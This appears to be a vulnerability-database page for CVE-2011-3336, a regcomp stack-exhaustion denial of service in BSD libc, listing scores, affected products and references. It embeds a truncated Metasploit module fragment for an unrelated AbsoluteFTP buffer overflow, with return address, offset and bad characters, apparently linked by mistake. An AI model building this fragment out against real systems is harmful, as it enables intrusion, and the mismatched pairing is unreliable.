CVE-2011-3336
published 2020-02-12CVE-2011-3336: regcomp in the BSD implementation of libc is vulnerable to denial of service due to stack exhaustion.
PriorityP351high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
EXPLOIT
EPSS
6.49%
92.9th percentile
regcomp in the BSD implementation of libc is vulnerable to denial of service due to stack exhaustion.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | 10.6.0 – 10.7.2 | — |
| apple | macos | — | — |
| freebsd | freebsd | — | — |
| openbsd | openbsd | — | — |
| php | php | 5.3.0 – 5.3.10 | — |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:N/I:N/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AbsoluteFTP 1.9.6 < 2.2.10 - 'LIST' Remote Buffer Overflow (Metasploit)
exploitdb·2011-11-09
CVE-2011-5164 AbsoluteFTP 1.9.6 < 2.2.10 - 'LIST' Remote Buffer Overflow (Metasploit)
AbsoluteFTP 1.9.6 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
'Description' => %q{
This module exploits VanDyke Software AbsoluteFTP by overflowing
a filename buffer related to the LIST command.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Node', # Original discovery, MSF module, ROP code
],
'Version' => '$Revision:$',
'References' =>
[
[ 'OSVDB', '---' ],
[ 'CVE', '---' ],
[ 'URL', '---' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0d\x5c\x2f\x0a",
},
'Targets' =>
[
[ 'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252',
{
'Ret' => 0x5f479005,
'Offset' => 3336
}
],
],
'Privileged' => false,
'DisclosureDate' => 'MONTH DAY YEAR',
'DefaultTarget' => 0))
end
#copypasted from ScriptFTP exploit
def on_
Exploit-DB
Libc - 'regcomp()' Stack Exhaustion Denial of Service
exploitdb·2011-11-04
CVE-2011-3336 Libc - 'regcomp()' Stack Exhaustion Denial of Service
Libc - 'regcomp()' Stack Exhaustion Denial of Service
---
No writeups or analysis indexed.
http://seclists.org/fulldisclosure/2014/Mar/166http://www.securityfocus.com/bid/50541https://cxsecurity.com/issue/WLB-2011110082https://www.securityfocus.com/archive/1/520390http://seclists.org/fulldisclosure/2014/Mar/166http://www.securityfocus.com/bid/50541https://cxsecurity.com/issue/WLB-2011110082https://www.securityfocus.com/archive/1/520390
2020-02-12
Published